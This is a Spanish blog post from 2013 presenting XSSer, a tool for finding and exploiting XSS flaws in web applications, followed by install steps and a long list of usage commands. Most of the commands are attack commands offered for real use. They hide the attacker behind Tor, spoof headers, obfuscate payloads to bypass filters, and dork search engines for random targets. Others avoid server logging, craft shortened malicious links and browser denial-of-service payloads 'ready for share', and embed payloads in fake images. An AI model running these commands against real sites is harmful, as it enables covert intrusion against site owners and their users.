miércoles, 27 de marzo de 2013

Xsser Herramienta XSS



Introducción

Cross Site "Scripter" (aka XSSer) es un marco automático para detectar, reportar y explotar las vulnerabilidades XSS en aplicaciones basadas en web. Contiene varias opciones para intentar evitar los filtros determinados y diversas técnicas especiales de inyección de código.

XSSer Gris Swarm

XSSer se ejecuta en muchas plataformas. Requiere Python y las siguientes bibliotecas: - python-pycurl - Uniones Python para libcurl - python-BeautifulSoup - analizador tolerante a errores HTML para Python python-libxml2 - - Enlaces de Python para la biblioteca GNOME XML - python-GeoIP - Enlaces de Python para el GeoIP IP a país librería de resolución en sistemas basados ​​en Debian (por ejemplo: Ubuntu), ejecute: sudo apt-get install python-pycurl python-libxml2-python BeautifulSoup python-geoip
Uso
xsser [opciones] [-u |-I |-D ] [-G |-P |-C Solicitar] [(s)] [vectoriales (s)] [Bypasser (s)] [Técnica (s)] [última inyección (s)] Opciones:

Ejemplos
Si tiene interesantes ejemplos de uso sobre XSSer, por favor envíe un correo electrónico a la lista de correo .
Simple injection from URL:

$ python xsser.py -u "http://host.com"
-------------------
* Simple injection from File, with tor proxy and spoofing HTTP Referer headers:

$ python xsser.py -i "file.txt" --proxy "http://127.0.0.1:8118" --referer "666.666.666.666" 
-------------------
* Multiple injections from URL, with automatic payloading, using tor proxy, injecting on payloads character encoding in "Hexadecimal", with verbose output and saving results to file (XSSlist.dat):

$ python xsser.py -u "http://host.com" --proxy "http://127.0.0.1:8118" --auto --Hex --verbose -w
-------------------
* Multiple injections from URL, with automatic payloading, using caracter encoding mutations (first, change payload to hexadecimal; second, change to StringFromCharCode the first encoding; third, reencode to Hexadecimal the second encoding), with HTTP User-Agent spoofed, changing timeout to "20" and using multithreads (5 threads):

$ python xsser.py -u "http://host.com" --auto --Cem "Hex,Str,Hex" --user-agent "XSSer!!" --timeout "20" --threads "5"
-------------------
* Advance injection from File, payloading your -own- payload and using Unescape() character encoding to bypass filters:

$ python xsser.py -i "urls.txt" --payload 'a="get";b="URL(\"";c="javascript:";d="alert('XSS');\")";eval(a+b+c+d);' --Une
-------------------
* Injection from Dork selecting "duck" engine (XSSer Storm!):

$ python xsser.py --De "duck" -d "search.php?"
-------------------
* Injection from Crawler with deep 3 and 4 pages to see (XSSer Spider!):

$ python xsser.py -c3 --Cw=4 -u "http://host.com"
-------------------
* Simple injection from URL, using POST, with statistics results:

$ python xsser.py -u "http://host.com" -p "index.php?target=search&subtarget=top&searchstring=" -s
-------------------
* Multiple injections from URL to a parameter sending with GET, using automatic payloading, with IP Octal payloading ofuscation and printering results in a "tinyurl" shortered link (ready for share!):

$ python xsser.py -u "http://host.com" -g "bs/?q=" --auto --Doo --short tinyurl 
-------------------
* Simple injection from URL, using GET, injecting a vector in Cookie parameter, trying to use a DOM shadow space (no server logging!) and if exists any "hole", applying your manual final payload "malicious" code (ready for real attacks!):

$ python xsser.py -u "http://host.com" -g "bs/?q=" --Coo --Dom --Fr="!enter your final injection code here!"
-------------------
* Simple injection from URL, using GET and trying to generate with results a "malicious" shortered link (is.gd) with a valid DoS (Denegation Of Service) browser client payload:

$ python xsser.py -u "http://host.com" -g "bs/?q=" --Dos --short "is.gd"
-------------------
* Multiple injections to multiple places, extracting targets from a list in a FILE, applying automatic payloading, changing timeout to "20" and using multithreads (5 threads), increasing delay between petitions to 10 seconds, injecting parameters in HTTP USer-Agent, HTTP Referer and in Cookie parameters, using proxy Tor, with IP Octal ofuscation, with statistics results, in verbose mode and creating shortered links (tinyurl) of any valid injecting payloads found. (real playing mode!): 

$ python xsser.py -i "list_of_url_targets.txt" --auto --timeout "20" --threads "5" --delay "10" --Xsa --Xsr --Coo --proxy "http://127.0.0.1:8118" --Doo -s --verbose --Dos --short "tinyurl"
-------------------
* Injection of user XSS vector directly in a malicious -fake- image created "on the wild", and ready to be uploaded.

$ python xsser.py --Imx "test.png" --payload "!enter your malicious injection code here!" 
-------------------
* Report output 'positives' injections of a dorking search (using "ask" dorker) directly to a XML file.

$ python xsser.py -d "login.php" --De "ask" --xml "security_report_XSSer_Dork_cuil.xml" 
-------------------


En Backtrack 5 tambien podemos encontrarlo: ruta Aplicaciones - Backtrack - Explotation Tools - Web Explotation - Xsser

Imagenes : 



Descarga: http://sourceforge.net/projects/xsser/files/

Saludos

Share:

0 comentarios:

Publicar un comentario

Labels

Analisis (6) Android (1) Auditoria (15) BruteFoce (7) centOS (1) Cloudflare (3) DDos (1) Distros (5) Exploits (3) firewall (1) hacking (11) Herramientas (126) Incapsula (1) lfi (1) Malware (2) Pentest (49) Perl (2) Proxys (1) python (10) Scan Sql (1) Seguridad (52) Windows (1) Wireless (5) Wordpress (1) XSS (5)

FOLLOWME


Translate

Followers